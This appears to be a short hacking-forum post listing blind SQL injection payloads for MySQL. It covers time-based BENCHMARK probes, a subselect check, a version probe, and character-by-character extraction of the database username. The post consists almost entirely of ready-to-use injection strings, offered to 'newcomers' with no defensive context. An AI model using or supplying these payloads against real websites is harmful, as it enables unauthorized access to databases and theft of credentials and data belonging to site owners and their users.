GreySec Forums

Full Version: [SQLi] Blind SQLi queries
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
[SQLi] Blind SQLi queries

Credits: Rouge Coder @ Intosec

Rouge Coder Wrote:First off, as the title says. This is not a tutorial. I've been messing around keeping my skills fresh today and wrote downsome blind SQLi queries that I used and thought I'd share them here.

Code:
// Check for blind injection vulnerability
OR (IF (1=2, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --

// Check for subselect
OR (SELECT 1)=1 --

// Find version
AND SUBSTRING(@@version,1,1) = 4 --

// Find length of database user
OR (IF (LENGTH(user()) > 1, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --

// Brute-force database username (65 = A -> 90 = Z, 97 = a -> 122 = z)
OR (IF (ASCII(SUBSTRING(user(),1,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find first letter
OR (IF (ASCII(SUBSTRING(user(),2,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find second letter
OR (IF (ASCII(SUBSTRING(user(),3,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find third letter

There's of course a lot more that can be done here, but this should at least give newcomers a decent idea about how blindsql injection is working.